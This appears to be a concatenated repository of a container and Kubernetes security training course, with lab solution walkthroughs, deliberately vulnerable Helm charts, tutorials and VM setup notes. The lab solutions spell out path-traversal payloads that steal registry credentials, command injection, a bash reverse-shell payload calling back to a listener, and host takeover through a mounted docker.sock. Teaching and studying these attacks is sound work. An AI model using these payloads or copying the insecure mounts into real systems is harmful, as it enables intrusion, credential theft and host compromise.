/gitbook/scenario-1/solution.md: -------------------------------------------------------------------------------- 1 | # Exploiting Private Registry via Misconfiguration - Solution 2 | 3 | * Navigate to the application `http://mailbox-service.student-uniquename.cloudsec.training` 4 | 5 | * Log in to the application using `username: bob` and `password: bobmailbox` 6 | 7 | ![](images/app-login.png) 8 | 9 | * We can see that `README.md` discloses information regarding the private registry 10 | 11 | ![](images/information-disclosure.png) 12 | 13 | 14 | * It appears that the `page` parameter is vulnerable to an Insecure Direct Object Reference, potentially allowing us to read other files on the system. 15 | 16 | * Let's try out a common payload and see if this IDOR is actually a path traversal vulnerability. We can read local files using the payload `qqqqq/../../etc/passwd` 17 | 18 | ![](images/path-traversal-exploitation.png) 19 | 20 | * Similarly, we can read other sensitive files on the system and find that it contains `/root/.docker/config.json` (registry credentials mounted into the container) using the payload `qqqqq/../../root/.docker/config.json` 21 | 22 | ![](images/docker-config.png) 23 | 24 | * We can use this docker configuration to pull docker images from the private registry. Save the `config.json` file onto your system 25 | 26 | * Run the following command to log in to the private registry with the recovered key. `_json_key` is the user name under which GCR accepts a service-account key as the password; if what you recovered is a Docker client `config.json` (an `auths` map) rather than the raw key, base64-decode its `auth` entry for `gcr.io` and use the JSON after `_json_key:`. Outside a lab, prefer `--password-stdin` over `-p` so the key does not end up in your shell history and process list. 
27 | 28 | ```bash 29 | docker login -u _json_key -p "$(cat config.json)" https://gcr.io 30 | ``` 31 | 32 | ![](images/docker-registry-login.png) 33 | 34 | * Now pull the private registry image to get the backend source code 35 | 36 | ```bash 37 | docker pull gcr.io/training-automation-stuff/backend-source-code:latest 38 | ``` 39 | 40 | ![](images/pull-private-image.png) 41 | 42 | * Inspecting the image using the docker run command 43 | 44 | ```bash 45 | docker run --rm -it gcr.io/training-automation-stuff/backend-source-code:latest sh 46 | ls -la 47 | cat index.js 48 | ``` 49 | 50 | ![](images/source-code-hardcoded-key.png) 51 | 52 | * Now you can see that we have the `NASA_DEMO_API_KEY`, which is hard-coded in the container image: anyone who can pull the image gets the key, which is why secrets must never be baked into images -------------------------------------------------------------------------------- /gitbook/scenario-4/solution.md: -------------------------------------------------------------------------------- 1 | # Docker escape using Pod Volume Mounts to access the node and host systems - Solution 2 | 3 | * Navigate to the application `http://connectivity-check.student-uniquename.cloudsec.training` 4 | 5 | * Log in to the application using `username: sysadmin` and `password: superpowers` 6 | 7 | ![](images/app-login.png) 8 | 9 | * Now try pinging `google.com` 10 | 11 | ![](images/ping-google.png) 12 | 13 | * We can see from the output that the application is running the `ping` system command. Let's run another system command by using a semicolon to separate two commands, since we know it runs on a Linux system. For example, providing an input of `google.com; id` would trigger `ping -c 2 google.com;id` in the backend. 14 | 15 | * Now that we have confirmed a command injection vulnerability, we can execute other commands and do other interesting things within this container. 16 | 17 | * Let's explore the file system and other services. 
Start by looking inside the `/custom/docker/` directory. 20 | 21 | ```bash 22 | ;ls -l /custom/docker/ 23 | ``` 24 | 25 | ![](images/custom-docker-socket.png) 26 | 27 | * Looks like the host's `docker.sock` is mounted into the pod as a volume. Anything that can talk to this socket controls the host's Docker daemon, which is effectively root on the node 28 | 29 | * Download the docker binary to access this socket and perform docker operations from within the container. This step needs outbound internet access from the pod 30 | 31 | ```bash 32 | ;wget https://download.docker.com/linux/static/stable/x86_64/docker-18.09.1.tgz -O /root/docker-18.09.1.tgz 33 | ``` 34 | 35 | ![](images/download-docker.png) 36 | 37 | * Now let's extract the archive under `/root` 38 | 39 | ```bash 40 | ;tar -xvzf /root/docker-18.09.1.tgz -C /root/ 41 | ``` 42 | 43 | ![](images/extract-docker-binary.png) 44 | 45 | * Now we can drive the host's Docker daemon from inside the container; the following commands list the containers and images present on the node 46 | 47 | ```bash 48 | ;/root/docker/docker -H unix:///custom/docker/docker.sock ps 49 | 50 | ;/root/docker/docker -H unix:///custom/docker/docker.sock images 51 | ``` 52 | 53 | ![](images/host-docker-containers.png) 54 | 55 | ![](images/host-docker-images.png) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/README.md: -------------------------------------------------------------------------------- 1 | # Getting started with docker 2 | 3 | Docker containers wrap a piece of software in a complete filesystem that contains everything needed to run: code, runtime, system tools, system libraries and anything that can be installed on a server. This guarantees that the software will always run the same, regardless of its environment. 
6 | 7 | 8 | ### Run your first docker container 9 | 10 | ```bash 11 | docker run hello-world 12 | ``` 13 | 14 | * When you run `docker run` command 15 | * Docker engine checks if the image is available or not 16 | * If image is not available, docker engine will pull from docker registry 17 | * If image is available, docker engine will run the command locally 18 | 19 | 20 | ![docker hello world container](images/helloworld-docker.png) 21 | 22 | ### How Docker Works? 23 | 24 | * `Docker` is the program that enables containers to be built, shipped and run 25 | * Docker Engine uses Linux Kernel namespaces and control groups 26 | 27 | ![Docker Architecture](images/docker-architecture.png) 28 | 29 | Image Reference: https://docs.docker.com/engine/docker-overview/ 30 | 31 | ### Terminology 32 | 33 | * Docker Image 34 | * Read only file with OS, libraries and apps 35 | * Anyone can create a docker image 36 | * Images can be stored in Docker hub (default public registry) or private registry 37 | * Docker Container 38 | * Stateful instance of an image with a writable layer 39 | * Contains everything needed to run your application 40 | * Based on one or more images 41 | * Docker Registry 42 | * Repository of images 43 | * Docker Hub 44 | * Public docker registry 45 | 46 | ### What is Docker Hub? 
47 | 48 | * Docker Hub is the public registry that contains a large number of images available for your use 49 | 50 | ![Docker Hub](images/docker-hub.png) 51 | 52 | 53 | ### Docker Search 54 | 55 | * You can also search through all publicly available images in docker hub 56 | 57 | ```bash 58 | docker search wpscan 59 | ``` 60 | 61 | ![docker search command](images/docker-search-wpscan.png) -------------------------------------------------------------------------------- /gitbook/kubernetes-101/readme.md: -------------------------------------------------------------------------------- 1 | # Getting started with Kubernetes 2 | 3 | We will get started by following the `Kubernetes Basics` from the official documentation which is hosted at [Kubernetes.io](https://kubernetes.io) 4 | 5 | This tutorial provides a walkthrough of the basics of the Kubernetes cluster orchestration system. 6 | 7 | > This is an important module to understand and cover because Kubernetes has many technical terms and commands that may be new to the participants. 8 | 9 | Each module contains some background information on major Kubernetes features and concepts and includes an **interactive online tutorial**. This is great for practicing the basics. Did we mention that this is available to all without any charges so you can practice it whenever you feel like it? 10 | 11 | These interactive tutorials let you manage a simple cluster and its containerized applications for yourself. 
12 | 13 | ## Creating a Cluster 14 | 15 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/create-cluster/cluster-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/create-cluster/cluster-interactive/) 16 | 17 | ## Deploying an App 18 | 19 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/deploy-app/deploy-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/deploy-app/deploy-interactive/) 20 | 21 | ## Exploring Your App 22 | 23 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/explore/explore-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/explore/explore-interactive/) 24 | 25 | ## Exposing Your App 26 | 27 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/expose/expose-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/expose/expose-interactive/) 28 | 29 | ## Scaling Your App 30 | 31 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/scale/scale-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/scale/scale-interactive/) 32 | 33 | ## Updating Your App 34 | 35 | - [https://kubernetes.io/docs/tutorials/kubernetes-basics/update/update-interactive/](https://kubernetes.io/docs/tutorials/kubernetes-basics/update/update-interactive/) 36 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: {{ include "mailbox-service.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 7 | helm.sh/chart: {{ include "mailbox-service.chart" . 
}} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | replicas: {{ .Values.replicaCount }} 12 | selector: 13 | matchLabels: 14 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 15 | app.kubernetes.io/instance: {{ .Release.Name }} 16 | template: 17 | metadata: 18 | labels: 19 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 20 | app.kubernetes.io/instance: {{ .Release.Name }} 21 | spec: 22 | containers: 23 | - name: {{ .Chart.Name }} 24 | image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}" 25 | imagePullPolicy: {{ .Values.image.pullPolicy }} 26 | # Custom Stuff 27 | volumeMounts: 28 | - name: privateregistry 29 | mountPath: "/root/.docker" 30 | readOnly: true 31 | # End Custom Stuff 32 | ports: 33 | - name: http 34 | containerPort: 80 35 | protocol: TCP 36 | livenessProbe: 37 | httpGet: 38 | path: / 39 | port: http 40 | readinessProbe: 41 | httpGet: 42 | path: / 43 | port: http 44 | resources: 45 | {{- toYaml .Values.resources | nindent 12 }} 46 | {{- with .Values.nodeSelector }} 47 | nodeSelector: 48 | {{- toYaml . | nindent 8 }} 49 | {{- end }} 50 | {{- with .Values.affinity }} 51 | affinity: 52 | {{- toYaml . | nindent 8 }} 53 | {{- end }} 54 | {{- with .Values.tolerations }} 55 | tolerations: 56 | {{- toYaml . 
| nindent 8 }} 57 | {{- end }} 58 | # Custom Stuff 59 | volumes: 60 | - name: privateregistry 61 | secret: 62 | secretName: privateregistrycreds 63 | -------------------------------------------------------------------------------- /gitbook/about-us/about-appsecco.md: -------------------------------------------------------------------------------- 1 | # About Appsecco 2 | 3 | [![About Appsecco](images/about-appsecco.png)](https://appsecco.com) 4 | 5 | Appsecco is a specialist application security company, founded in 2015, with physical presence in London, Bangalore, Doha and Boston, providing industry leading security advice that is firmly grounded in commercial reality. 6 | 7 | Our services cover the entire software development lifecycle, from advising on how to build and foster a culture of security within development teams and organisations, to reviewing and advising on the security of applications and associated infrastructure under development, to providing rapid response and advice in the event of a security breach or incident. 8 | 9 | As a team, we are highly qualified and have many years of extensive experience working with clients across multiple countries and in a wide range of industries and sectors; from financial services to software development, manufacturing to governmental organisations and consumer brands to ecommerce. 10 | 11 | The solutions, advice and insight we deliver to our clients always follow three core principles: 12 | 13 | 1. It must be pragmatic; taking into account the specific commercial, organisational and operational realities of each client individually 14 | 2. It must genuinely add value; the advice or solutions we provide must address the specific problem a client seeks to solve and have actionable insight to enable them to achieve this 15 | 3. 
Never be purely automated; whenever we are testing for security our reports and output always have significant, expert, human input to give the greatest possible value for our clients 16 | 17 | In addition to their client-facing work our technical team are actively involved in researching and developing new and better ways to stay secure and can regularly be found presenting their findings at industry conferences and events ranging from nullcon in India, DevSecCon in London and Singapore, to DEF CON, the world’s largest security conference held annually in the USA. 18 | 19 | Structurally we are a UK Limited company with a wholly owned Indian subsidiary (where the majority of our technical resource is based) and raised seed funding for our continuing growth in the UK in late 2016. -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/namespaces.md: -------------------------------------------------------------------------------- 1 | # Namespaces 2 | 3 | Docker uses namespaces to provide the isolated workspace called the container. When you run a container, Docker creates a set of namespaces for that container. 
4 | 5 | * The `pid` namespace: Process isolation (PID: Process ID) 6 | * The `net` namespace: Managing network interfaces (NET: Networking) 7 | * The `ipc` namespace: Managing access to IPC resources (IPC: InterProcess Communication) 8 | * The `mnt` namespace: Managing filesystem mount points (MNT: Mount) 9 | * The `uts` namespace: Different host and domain names (UTS: Unix Timesharing System) 10 | * The `user` namespace: Isolate security-related identifiers (USER: userid, groupid) 11 | 12 | ## Namespaces Demonstration 13 | 14 | ``` 15 | docker run --rm -d alpine sleep 1111 16 | 17 | ps auxx | grep 'sleep 1111' 18 | 19 | sudo ls /proc/[pid]/ns/ 20 | ``` 21 | 22 | ![docker container namespaces](images/docker-container-namespaces.png) 23 | 24 | ### PID namespace 25 | 26 | * PID namespaces isolate the process ID number space, meaning that processes in different PID namespaces can have the same PID 27 | 28 | * PID namespaces allow containers to provide functionality such as suspending/resuming the set of processes in the container and migrating the container to a new host while the processes inside the container maintain the same PIDs 29 | 30 | > For example, while running an nginx docker container we always get PID 1 for nginx, but on the host we see a different PID like `9989` 31 | 32 | ```bash 33 | docker run --rm --name=samplewebapp1 -d nginx:alpine 34 | ps auxxx | grep nginx 35 | 36 | docker exec -it samplewebapp1 sh 37 | ps auxxx | grep nginx 38 | ``` 39 | 40 | ![docker nginx 1](images/docker-nginx-1.png) 41 | 42 | ```bash 43 | docker run --rm --name=samplewebapp2 -d nginx:alpine 44 | ps auxxx | grep nginx 45 | 46 | docker exec -it samplewebapp2 sh 47 | ps auxxx | grep nginx 48 | ``` 49 | 50 | ![docker nginx 2](images/docker-nginx-2.png) 51 | 52 | * Here we can see that both processes have different PIDs on the host system, but inside the container they both use PID 1 53 | 54 | 55 | ### Attaching host processes to container 56 | 57 | * We can also pass or attach the host 
process namespace or any other container process namespace to container using the --pid flag 58 | 59 | ```bash 60 | docker run --rm -it --pid=host jess/htop 61 | ``` 62 | 63 | ![docker pid host](images/docker-pid-host.png) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: {{ include "connectivity-check.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 7 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | replicas: {{ .Values.replicaCount }} 12 | selector: 13 | matchLabels: 14 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 15 | app.kubernetes.io/instance: {{ .Release.Name }} 16 | template: 17 | metadata: 18 | labels: 19 | app.kubernetes.io/name: {{ include "connectivity-check.name" . 
}} 20 | app.kubernetes.io/instance: {{ .Release.Name }} 21 | spec: 22 | containers: 23 | - name: {{ .Chart.Name }} 24 | image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}" 25 | imagePullPolicy: {{ .Values.image.pullPolicy }} 26 | # Custom Stuff for Volume Mount of Docker Socket 27 | volumeMounts: 28 | - mountPath: /custom/docker/docker.sock 29 | name: docker-sock-volume 30 | securityContext: 31 | privileged: true 32 | # End Custom Stuff 33 | ports: 34 | - name: http 35 | containerPort: 80 36 | protocol: TCP 37 | livenessProbe: 38 | tcpSocket: 39 | port: http 40 | initialDelaySeconds: 15 41 | periodSeconds: 20 42 | readinessProbe: 43 | tcpSocket: 44 | port: http 45 | initialDelaySeconds: 5 46 | periodSeconds: 10 47 | resources: 48 | {{- toYaml .Values.resources | nindent 12 }} 49 | {{- with .Values.nodeSelector }} 50 | nodeSelector: 51 | {{- toYaml . | nindent 8 }} 52 | {{- end }} 53 | {{- with .Values.affinity }} 54 | affinity: 55 | {{- toYaml . | nindent 8 }} 56 | {{- end }} 57 | {{- with .Values.tolerations }} 58 | tolerations: 59 | {{- toYaml . 
| nindent 8 }} 60 | {{- end }} 61 | # Custom Stuff 62 | volumes: 63 | - name: docker-sock-volume 64 | hostPath: 65 | path: /var/run/docker.sock 66 | type: File 67 | # End Custom 68 | -------------------------------------------------------------------------------- /gitbook/deploy-app/using-yaml.md: -------------------------------------------------------------------------------- 1 | # Deploying simple application in Kubernetes Cluster using YAML 2 | 3 | * To create a basic nginx deployment with 2 replicas, save this file as `nginx-deployment.yaml` using your text editor 4 | 5 | ```yaml 6 | apiVersion: apps/v1 7 | kind: Deployment 8 | metadata: 9 | name: nginx-deployment 10 | spec: 11 | selector: 12 | matchLabels: 13 | app: nginx 14 | replicas: 2 15 | template: 16 | metadata: 17 | labels: 18 | app: nginx 19 | spec: 20 | containers: 21 | - name: nginx 22 | image: nginx:1.7.9 23 | ports: 24 | - containerPort: 80 25 | ``` 26 | 27 | * Run the apply command to perform the changes in cluster 28 | 29 | ```bash 30 | kubectl apply -f nginx-deployment.yaml 31 | ``` 32 | 33 | * Get the pods related to this deployment 34 | 35 | ```bash 36 | kubectl get pods --selector app=nginx 37 | ``` 38 | 39 | ![](images/deploy-app-get-pods.png) 40 | 41 | * Update the deployment file with `replicas` to 3 in `nginx-deployment.yaml` using your text editor 42 | 43 | ```yaml 44 | ... 45 | replicas: 3 46 | ... 
47 | ``` 48 | 49 | * Apply the changes 50 | 51 | ```bash 52 | kubectl apply -f nginx-deployment.yaml 53 | kubectl get pods --selector app=nginx 54 | ``` 55 | ![](images/update-deployment.png) 56 | 57 | * Expose a service within the cluster 58 | * Create a file `nginx-service.yml` with the following content 59 | 60 | ``` 61 | apiVersion: v1 62 | kind: Service 63 | metadata: 64 | name: nginx-deployment 65 | spec: 66 | ports: 67 | - port: 80 68 | protocol: TCP 69 | targetPort: 80 70 | selector: 71 | app: nginx 72 | type: ClusterIP 73 | ``` 74 | 75 | * Create the service in the cluster 76 | 77 | ``` 78 | kubectl apply -f nginx-service.yml 79 | ``` 80 | 81 | * Start a `port-forward` to access the in-cluster service 82 | 83 | ``` 84 | kubectl port-forward svc/nginx-deployment 8888:80 85 | ``` 86 | 87 | * From another terminal, access the service through the port forward 88 | 89 | ``` 90 | curl http://localhost:8888/ 91 | ``` 92 | 93 | * Delete the deployment 94 | 95 | ```bash 96 | kubectl delete -f nginx-deployment.yaml 97 | ``` 98 | ![](images/delete-deploy.png) 99 | 100 | * Delete the service 101 | 102 | ``` 103 | kubectl delete -f nginx-service.yml 104 | ``` 105 | 106 | 107 | ### References 108 | 109 | * [https://kubernetes.io/docs/tasks/run-application/run-stateless-application-deployment/](https://kubernetes.io/docs/tasks/run-application/run-stateless-application-deployment/) -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-images-containers.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Images and Containers 2 | 3 | There are multiple checks we can perform to audit docker images and containers. Containers are nothing but running instances of an image. We can look at an image's configuration and options to find any issues or misconfigurations. 
4 | 5 | ## Checking the checksum for the images 6 | 7 | ```bash 8 | docker images --digests ubuntu 9 | ``` 10 | 11 | ![docker images digest](images/docker-digest-images.png) 12 | 13 | ## Checking for content trust to get signatures 14 | 15 | * Content trust is disabled by default. To enable it, set the `DOCKER_CONTENT_TRUST` environment variable to 1 16 | 17 | * Checking the image issuers with `docker trust` 18 | 19 | ```bash 20 | docker trust inspect mediawiki --pretty 21 | ``` 22 | 23 | ![docker trust inspect](images/docker-trust.png) 24 | 25 | ## Looking for known vulnerabilities 26 | 27 | * Most of the containers in dockerhub use base containers. If those aren't updated frequently, then known vulnerabilities might exist in them 28 | 29 | * We can use docker hub registry scanning, clair (Vulnerability Static Analysis for Containers) to check for vulnerable packages in images 30 | 31 | * Let's now check for the known vulnerabilities for old docker images using [vulners audit](https://vulners.com/audit) 32 | 33 | ![vulners audit site](images/vulners-audit-site.png) 34 | 35 | > Vulners audit tool provides you with the ability to easily check the OS for vulnerable packages. Select your OS type, version and paste the list of installed packages to identify the vulnerable software. 36 | 37 | ```bash 38 | docker run --rm -it 71aa5f3f90dc bash 39 | 40 | cat /etc/issue 41 | 42 | dpkg-query -W -f='${Package} ${Version} ${Architecture}\n' 43 | ``` 44 | 45 | ![docker query packages](images/docker-image-packages-query.png) 46 | 47 | * Now, we will paste these packages in the vulners and see the list of known vulnerabilities 48 | 49 | ![known vulnerabilities](images/knwon-vulnerabilities.png) 50 | 51 | ### Vulnerability Scan using Trivy 52 | 53 | > [Trivy](https://github.com/aquasecurity/trivy) can also be used for running vulnerability scan on docker images. 
54 | 55 | ``` 56 | docker run --rm \ 57 | -v ~/.cache:/root/.cache/ \ 58 | -v /var/run/docker.sock:/var/run/docker.sock \ 59 | aquasec/trivy ubuntu 60 | ``` 61 | 62 | 63 | ## Checking for metadata, secrets and environment variables 64 | 65 | * We can check for this data using the `docker inspect` command on both images and containers 66 | 67 | ```bash 68 | docker inspect IMAGE_ID 69 | docker inspect CONTAINER_ID 70 | ``` -------------------------------------------------------------------------------- /gitbook/attacking-insecure-volume-mounts/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking insecure volume mounts - Solution 2 | 3 | * The application is running on the CTF VM. You can access it by navigating to `http://CTFVMIP` 4 | 5 | ![node app home page](images/insecure-mount-node-app.png) 6 | 7 | * This NodeJS application is vulnerable to remote code execution (RCE) in the `q` GET parameter. Access the endpoint using `http://CTFVMIP/?q="docker"` 8 | 9 | ![vulnerable parameter](images/insecure-mount-vulnerable-parameter.png) 10 | 11 | * To exploit this RCE, we will be using the payload below. Here `192.168.56.3` needs to be replaced with your student VM IP 12 | 13 | ```bash 14 | require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.3/5555 0>%261"') 15 | ``` 16 | 17 | * Start the netcat listener on the `student` machine to get the reverse shell 18 | 19 | ```bash 20 | nc -lvp 5555 21 | ``` 22 | 23 | ![nc listen in student vm](images/nc-student-listen.png) 24 | 25 | * To exploit and get the reverse shell use the below URL. It contains the payload to connect back to the student vm. 
Ensure that you have replaced `192.168.56.3` with your student VM IP 26 | 27 | ```bash 28 | http://CTFVMIP?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.3/5555 0>%261"') 29 | ``` 30 | 31 | ![reverse shell exploit](images/insecure-mount-exploit.png) 32 | 33 | * Now we will receive the reverse shell in our student vm where we listening via `nc` 34 | 35 | ![reverse shell in nc](images/insecure-mont-reverse-shell.png) 36 | 37 | * Now, we have shell inside the docker container, we can explore the container for post exploitation 38 | 39 | * We can see that `ls -l /var/run/docker.sock` is available and mounted from the host system. 40 | 41 | ![docker socket](images/insecure-mount-docker-socket.png) 42 | 43 | > **This allows attacker to access the host docker service using host option with docker client by using the UNIX socket** 44 | 45 | * The docker client is already downloaded into the container and is at `/root/docker` 46 | 47 | ```bash 48 | cd /root/docker/ 49 | ls -l 50 | ``` 51 | 52 | ![docker client files](images/docker-client-file.png) 53 | 54 | * To access the host resource using the `docker.sock` UNIX socket. 
Run the following 55 | 56 | ```bash 57 | ./docker -H unix:///var/run/docker.sock ps 58 | ./docker -H unix:///var/run/docker.sock images 59 | ``` 60 | 61 | ![accessing host system using docker socket](images/accessing-host-system-using-socket.png) 62 | 63 | * Now, we have full privilege over the host system :) 64 | 65 | 66 | ## Fixing this vulnerability 67 | 68 | * Running the containers with limited user privileges and using rootless containers 69 | * Also using isolated instances for the required privileges 70 | * Not mounting the host docker socket (`/var/run/docker.sock`) into application containers, since any process that can reach the socket controls the host docker service 71 | -------------------------------------------------------------------------------- /gitbook/environment-setup/importing-virtualmachines.md: -------------------------------------------------------------------------------- 1 | # Importing virtual machines 2 | 3 | The students need to import two virtual machines for the docker labs 4 | 5 | 1. `docker-student.ova` 6 | 2. `docker-ctf.ova` 7 | 8 | 9 | ## Download VM 10 | 11 | | VM Name | Source URL | 12 | |---------|------------| 13 | | docker-student.ova | http://www.mediafire.com/file/72xe4d4vv10fgxz/docker-student.ova/file | 14 | | docker-ctf.ova | http://www.mediafire.com/file/39e1w5wt7tmxr43/docker-ctf.ova/file | 15 | 16 | The `checksums` are available at `http://www.mediafire.com/file/6xp3c7voy60zn1e/checksum.txt/file` 17 | 18 | ## Student Machine (docker-student.ova) 19 | 20 | * Open VirtualBox, and select `File` -> `Import Appliance` from the top menu 21 | 22 | ![Importing student ova](images/import-ova.png) 23 | 24 | * Select the `docker-student.ova` file from the `workshop-content` folder 25 | 26 | ![selecting student ova](images/select-student-ova.png) 27 | 28 | * Check the "Reinitialize the MAC address of all network cards" checkbox, and click on Next to import the ova file 29 | 30 | ![student ova settings](images/student-ova-settings.png) 31 | 32 | * Now we can see that the ova file is being imported 33 | 34 | ![processing](images/processing.png) 35 | 36 | * Use the following credentials for `student` VM login 37 | 38 | 
```bash 39 | username: student 40 | password: Docker@321 41 | ``` 42 | 43 | ![student vm login](images/student-vm-login.png) 44 | 45 | * Your IP address may differ from what is visible in the screenshot. Please note down this IP address for later use 46 | 47 | ## CTF Machine (docker-ctf.ova) 48 | 49 | 50 | * Open VirtualBox, and select `File` -> `Import Appliance` from the top menu 51 | 52 | ![Importing ctf ova](images/import-ova.png) 53 | 54 | * Select the `docker-ctf.ova` file from the `workshop-content` folder 55 | 56 | ![selecting ctf ova](images/select-ctf-ova.png) 57 | 58 | * Check the "Reinitialize the MAC address of all network cards" checkbox, and click on Next to import the ova file 59 | 60 | ![ctf ova settings](images/ctf-ova-settings.png) 61 | 62 | * Use the following credentials for `ctf` VM login 63 | 64 | ```bash 65 | username: ctf 66 | password: Dockerctf@321 67 | ``` 68 | 69 | ![ctf vm login](images/ctf-vm-login.png) 70 | 71 | * Your IP address may differ from what is visible in the screenshot. Please note down this IP address for later use 72 | 73 | ## Test Setup 74 | 75 | ### Ensure Networking within VM 76 | 77 | > Ensure you are able to `ping` one VM from the other. 78 | 79 | ![VM Networking](images/vm-networking.png) 80 | 81 | ### Ensure SSH Access from Host 82 | 83 | > Ensure you are able to SSH into both the `Student` and `CTF` VM from your host using an SSH client. 84 | 85 | ![VM Host SSH](images/vm-host-ssh.png) --------------------------------------------------------------------------------